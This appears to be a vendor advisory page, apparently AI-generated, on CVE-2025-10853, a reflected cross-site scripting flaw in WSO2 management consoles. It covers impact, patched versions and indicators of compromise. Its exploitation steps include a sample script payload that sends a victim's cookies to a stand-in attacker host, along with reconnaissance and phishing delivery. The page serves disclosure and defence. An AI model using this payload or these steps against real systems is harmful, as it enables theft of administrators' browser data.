CVE-2025-10853
WSO2 API Manager vulnerability analysis and mitigation

Overview

CVE-2025-10853 is a reflected cross-site scripting (XSS) vulnerability in the management console of multiple WSO2 products, caused by improper output encoding. By tampering with specific request parameters, an unauthenticated remote attacker can inject arbitrary JavaScript into server responses. The vulnerability was disclosed on November 5, 2025, and affects a broad range of WSO2 products including API Manager (3.1.0–4.5.0), Identity Server (5.10.0–7.1.0), Enterprise Integrator (6.6.0), API Control Plane (4.5.0), Traffic Manager (4.5.0), Universal Gateway (4.5.0), Open Banking AM/IAM (2.0.0), and Identity Server as Key Manager (5.10.0). It carries a CVSS v3.1 base score of 6.1 (Medium) per NIST NVD, and 5.2 (Medium) per WSO2 as the CNA (WSO2 Advisory, Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the reflected variant (CAPEC-591). The vulnerability arises because the WSO2 management console fails to properly encode user-supplied input before including it in HTTP responses, allowing injected JavaScript to execute in the victim's browser context. Exploitation requires no authentication and no special privileges, but does require user interaction — a victim must be tricked into clicking a crafted URL containing the malicious payload. The attack vector is network-based, with low attack complexity (WSO2 Advisory, Red Hat CVE).

Impact

Successful exploitation can result in UI manipulation, redirection of users to malicious websites, and theft of sensitive data accessible from the browser (e.g., tokens, form data, or page content). Because session-related cookies are protected with the httpOnly flag, direct session hijacking via cookie theft is mitigated, though other session-related attacks may still be feasible. The scope is changed (S:C), meaning the injected script executes in the victim's browser context rather than the server, affecting confidentiality and integrity at a low level with no direct availability impact (WSO2 Advisory).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Red Hat CVE, WSO2 Advisory).

Exploitation steps

  1. Reconnaissance: Identify publicly accessible WSO2 management console instances (e.g., via Shodan or Censys) running affected product versions such as API Manager 3.1.0–4.5.0 or Identity Server 5.10.0–7.1.0.
  2. Parameter identification: Review the WSO2 management console endpoints and identify URL parameters that are reflected in the HTTP response without proper encoding.
  3. Craft malicious URL: Construct a URL targeting the vulnerable endpoint with a crafted parameter value containing a JavaScript payload, e.g., <script>document.location='https://attacker.com/?c='+document.cookie</script> (URL-encoded).
  4. Deliver payload: Send the crafted URL to a target user (e.g., an administrator) via phishing email, social engineering, or embedded link, inducing them to click it while authenticated to the management console.
  5. Achieve objective: When the victim loads the URL, the injected JavaScript executes in their browser, enabling the attacker to steal browser-accessible data, redirect the user to a malicious site, or manipulate the management console UI (WSO2 Advisory).

Indicators of compromise

  • Network: Unusual HTTP GET or POST requests to WSO2 management console endpoints containing URL-encoded JavaScript patterns (e.g., %3Cscript%3E, javascript:, onerror=, onload=) in query parameters; outbound connections from the management console host to unknown external IPs following user interaction.
  • Logs: WSO2 access logs showing requests to management console URLs with anomalous parameter values containing HTML/JavaScript special characters; repeated requests from the same source IP with varying XSS payloads (indicating probing).
  • File System: No direct file system artifacts expected for reflected XSS; however, monitor for any unexpected scripts or files dropped if XSS is chained with other vulnerabilities.
  • Process/Browser: Unexpected redirects or pop-ups reported by management console users; browser developer tool alerts about script execution from unexpected sources.

Mitigation and workarounds

WSO2 has released patched versions for all affected products; administrators should update to the fixed builds detailed in the WSO2 security advisory WSO2-2025-4486. Key patched versions include API Manager 3.1.0 → 3.1.0.344+, 3.2.0 → 3.2.0.445+, 4.0.0 → 4.0.0.365+, 4.1.0 → 4.1.0.227+, 4.2.0 → 4.2.0.167+, 4.3.0 → 4.3.0.79+, 4.4.0 → 4.4.0.43+, 4.5.0 → 4.5.0.26+; Identity Server 5.10.0 → 5.10.0.373+, 5.11.0 → 5.11.0.417+, 6.0.0 → 6.0.0.247+, 6.1.0 → 6.1.0.246+, 7.0.0 → 7.0.0.122+, 7.1.0 → 7.1.0.29+; Enterprise Integrator 6.6.0 → 6.6.0.223+; and other products as listed in the advisory. As interim mitigations, restrict access to the management console to trusted networks only, implement Content Security Policy (CSP) headers, and monitor console access logs for anomalous activity (WSO2 Advisory).

Additional resources


SourceThis report was generated using AI

Related WSO2 API Manager vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-5430CRITICAL10
  • WSO2 API Manager logoWSO2 API Manager
  • cpe:2.3:a:wso2:api_manager
NoYesAug 06, 2026
CVE-2026-1728CRITICAL9.8
  • WSO2 API Manager logoWSO2 API Manager
  • cpe:2.3:a:wso2:api_manager
NoYesAug 06, 2026
CVE-2025-15039CRITICAL9.4
  • WSO2 API Manager logoWSO2 API Manager
  • cpe:2.3:a:wso2:api_manager
NoYesAug 06, 2026
CVE-2026-0637MEDIUM4.4
  • WSO2 API Manager logoWSO2 API Manager
  • cpe:2.3:a:wso2:identity_server
NoYesAug 06, 2026
CVE-2025-13736LOW3.7
  • WSO2 API Manager logoWSO2 API Manager
  • cpe:2.3:a:wso2:api_manager
NoYesAug 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management